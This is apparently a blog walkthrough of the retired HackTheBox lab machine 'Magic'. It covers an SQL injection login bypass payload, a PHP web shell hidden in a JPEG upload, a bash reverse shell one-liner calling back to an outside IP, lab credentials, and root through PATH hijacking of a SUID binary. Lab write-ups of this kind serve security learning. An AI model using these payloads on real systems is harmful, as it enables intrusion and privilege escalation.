Open in app

Sign in

Write

Sign in

MAGIC HackTheBox Walkthrough

Musyoka Ian
14 min readAug 22, 2020

--

Hello guy HackTheBox team has just retired magic meaning am allowed to release a walkthrough on it. The box according to my opinion was a really fun box and has a lot of OSCP techniques involved that’s one thing that made me really like the box. The second thing that made me love the box was that it wasn’t that complex meaning every step of the way you had a clue of what you need to do to advance to the next stage of the box making it really easy to tackle. You start off by getting a login page and intercept the request with sqlmap then use SQLmap to try finding if the login page was vulnerable to SQL injection attacks in the middle of the requests you see a 302 redirect meaning something good must have happened but if you aren’t too careful you might miss it then we send the requests through burp and find the payload that worked and use it to login to the website. Next you find that the file upload mechanism can be bypassed meaning you can upload a malicious PHP file and use it to get a shell on the box. Next you dump the contents of a SQL database and get additional credential that allows you to escalate your privileges from the Apache user (WWW-data) to a user on the box . User piece done!!!. For root you find a binary that has path manipulation vulnerability exploit it to get root on the box. It’s a really fun box am sure you’ll like it. Without much say let’s jump in.

As always we’ll start off with a nmap scan of the box. This always gives us a good idea of the services that are running on the box and if we are lucky we might get a service that has an exploit and use it to get a shell on the box

Looking at the nmap results we see that there are two port that are open on the box

SSH and HTTP and since HTTP has a bigger attack surface compared to SSH that’s what we are going to begin looking at. We can’t start brute forcing SSH since we don’t even have a valid username yet

Opening the webpage on port 80 we get a standard webpage

Looking at the source code nothing interesting shows up

Tried to see if robots.txt existed on the web server but got nothing

I decided to leave gobuster which is a tool used to brute-force URIs including directories and files as well as DNS subdomains running in the background while i manually pork on the page

Going back to the webpage we see there is a link to login. Clicking on it gets us to a login page

Sweet there are thing we could to do with a login page

  1. Bruteforce the password with common usernames like admin,root,guest etc
  2. The login page is vulnerable SQL injections and we could use that to dump the database which could contain credentials of users
  3. The login page could be vulnerable to nosql injection and we could use it to dump user credentials from the database
  4. We could use SQL injection or nosql injection to bypass the login page
  5. It could just be a rabbit hole put there to slow us down and waste our time
  6. We could try dump credentials like admin:admin, guest:guest,admin:password and hope we get lucky
  7. The login credentials have been left somewhere on the box like probably in NFS shares, SMB share or even some random web directory and we need to find it using various methods

First i submit dump credentials dump didn’t get any quick wins there.

Next i intercepted the request with burpsuite and saved it to a file

Then ran sqlmap using it

While sqlmap was running i saw something unusual

We had been redirected to uploads.php

This means that something good must have happened i decided to interept the request with burpsuite and see the payload that worked

And after looking at many of the requests i found the one that worked was the one below

Since looking at the response it gave us a 302 redirect

I decided to URL decode the request to see the exact payload that worked

Looking above we get the exact payload

admin' ORDER BY 1-- -

Sweet let’s go back to the webpage and see if it will bypass the login

On clicking login we get logged in immediately even without submitting a password sweet

I decided to let sqlmap finish the requests and see if i will be able to dump the database because we could use those credentials to login in to the box via SSH

But looking back at slqmap it got nothing

Meaning if you we waiting a successful injection message you could have easily missed that

After finishing the box i decided to go back and see if i could find any other way i could bypass the login page then remembered PayloadAllTheThing GitHub has a great wordlists used for authentication bypass. I tried to fuzz the login page with wordlist Auth_Bypass.txt and see the payloads that would work and found a few payloads that worked 5 to be exact

Then again fuzzed using Auth_Bypass2.txt and found 10 payloads that worked Sweet now we have 15 payloads at our disposal that works

After bypassing the login page we are greeted with an upload page

Let’s try uploading an image and see if it works

And as you see above images are allowed. Next lets try uploading PHP files and see if we get lucky because if we can upload PHP file we can use it to our advantage and execute system command using PHP

I created a simple echo command before trying to execute any system command to see if PHP safe mode was enabled

I saved the file and tried uploading it to the web server but got an error saying that only images can be uploaded to the webserver

Question: How does the server determines whether it’s an image or not ?

By using something called magic bytes which essentially is data used to identify or verify the content of a file. To determine exactly what file type it is

Like for our PHP script if we run file command against it we see it’s just ascii text

Let’s try manipulating our image with hexeditor to make it look like an image using a (hex) magic bytes of a jpeg

Still it didn’t work but since we get a JavaScript popup i thought there was some client validation going on due to JavaScript displayed on the screen i decided to send a legit image through and intercept the request with burpsuite

Then i did send the request to burpsuite and and started playing with it

First i added a PHP shell in the middle of the picture

Next i added .php extension to the filename

Then i did send the request

Looking at the response i got a file uploaded successfully

Let’s navigate to the image

And voila we see that it exists

Let’s try and see if we can execute code. I know it sounds odd that a jpg exension allows PHP to be executed but i think the web server just looks if there’s a php extension in the filename and if there is it executes the PHP code withinh the file

And voila we have code execution through file upload

Next we have to get a shell so i intercepted the request with burpsuite and made sure it was working correctly

And as you see below we have code execution. Next the cheat sheet that i normally use for reverse shells is

Pentest monkeys reverse shell cheat sheet

They payload that i used is

bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'

The reason why i added bash -c was because i wanted to ensure that we are in a bash context since that specific reverse shell is a bash specific thing

Next i did url encode the payload suing ctrl + u

The i did setup a netcat listener on my local box using the port i had specified on the reverse shell payload

Then i executed the payload using burpsuite

Going back to my netcat listener we had a shell on the box sweet

Wow cool now we are in the box next it’s time to upgrade my shell to be fully functional

Next i decided to look at PHP file someone might get lucky and find credentials that might allow us to escalate our privileges

Looking at db.php5 we get credentials for a user called theseus

theseus:iamkingtheseus

Looking at passwd we see that he’s a user on the box

Let’s try and see if there’s credentials reuse going on

But we got an authentication failure as you see above

Next i decided to run lipeas but i actually got nothing really useful

The i remembered MySQL was running from the lipeas output

I tried logging into MySQL but the binary was not available

Great this is where things got a bit weird and i was stuck for a while but i remembered that we don’t actually have to login in to the database we can just dump the contents of the database using mysqldump.

After i typed the password that we retrieved from the PHP File i got all the contents of the database

I decided to look at the contents of the database and found additional credentials

admin:Th3s3usW4sK1ng

I decided to try those credentials for the user Theseus and got a successful login

Sweet now we can read the user flag

Next we have now to escalate our privileges to the root user i ran lipeas again and got a custom binary that had a suid bit on it and also the binary was owned by root meaning since it had a suid bit set we can execute the binary as the root user though we are not the root user

That was definitely interesting

I decided to run the application and found it does some system checks of some kind

I copied the binary to my local box and examined it with ltrace

Looking at the output we see that it execute system commands without specifying the full path it just specifies the relative path

This is where the vulnerability comes into play. The vulnerability is called path variable manipulation vulnerability. It is an old OSCP technique but still works in modern operating systems

And I’ve talked about it it my previous article wonderland before basically the programs that run on a terminal and call other programs or binaries if the full path of the binary isn’t specified an attacker can possible hijack the path and cause the program to execute a dummy application that has a name which is the same as the true application

A path in any Linux system is the way the OS knows where to look for executable binaries. As you see in the output below those are the specific locations where the binaries are stored including the programs that our application sysinfo calls

For example lshw application

When we execute lshw in the terminal it looks through all those locations to find where lshw is stored

Using which command we wee that lshw binary is in

/usr/bin

But the developer of the application sysinfo didn’t specify a full PATH as you see below

Meaning if we can hijack the PATH we can cause the program to execute our own script and not the intended binary. But as I’ve said we need to modify the path and modifying the PATH is as simple as using the one liner command below

export PATH=/tmp:$PATH

After running that command the tmp directory has been added to our path

when we look at the path again

Meaning if we place a dummy script in the tmp directory it will get executed instead of the real lshw binary

I created a dummy script which if it gets executed we will get a ping on our box. In my box i did set up a tcpdump listener

Then i executed sysinfo again and voila we got a ping on our local box

We’ve successfully hihacked the PATH now we can use this to our advantage and get a root shell on the box

This time i told the script to execute a bash reverse shell with our IP address which in turn will give us a root shell on the box

Then i created a netcat listener back on my local box

Saved and then executed sysinfo again

And voila we have a root shell on the box

Sweet we are now root on the box

We can submit the root flag and get our points

And the box is pretty much done easy right and you get 30 points from the box!!!!!

Now let’s go back and get a shell as the Apache user (www-data)

First set up a netcat listener

Second send the payload and get a shell

We already know the password for the user theseus

theseus:Th3s3usW4sK1ng

Let’s try escalate our privileges to that user

Looking at the output we get an error

su: must be run from a terminal

Ok no worries let try logging in via SSH

Looking below we get another error that we can only login by using a public key. We’ve hit a dead end why is this so?

Because we didn’t upgrade our shell like we did the first time and i saw people actually getting stuck at this place in Hackthebox forum. People were asking for hints

That’s why i always upgrade my shell once i get one to avoid such problems and it also make my work easier since i get tab auto completion and such

Let’s try upgrading our shell again and run the same command

1. python3 -c 'import pty;pty.spawn("/bin/bash")'
OR
1. python -c 'import pty;pty.spawn("/bin/bash")'2.ctrl + z (background the session)3. stty raw -echo;fg
(press enter twice)4. export TERM=screen (enables clearing screen)

Then let’s try logging in as theseus again

And voila it works!!!!

The message i was driving home is that always at al times upgrade your shell after you get one it saves someone from lot’s of problems

Hope you guys enjoyed the walkthrough if so please clap for me down below and also follow me so that you won’t miss any upcoming walkthoughs

But that’s it for now guys till next time it goodbye

Hackthebox
Magic
Walkthrough
File Upload Vulnerability
Path Variable Manipuation

--

--

Musyoka Ian
Musyoka Ian

Written by Musyoka Ian

752 Followers
5 Following

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams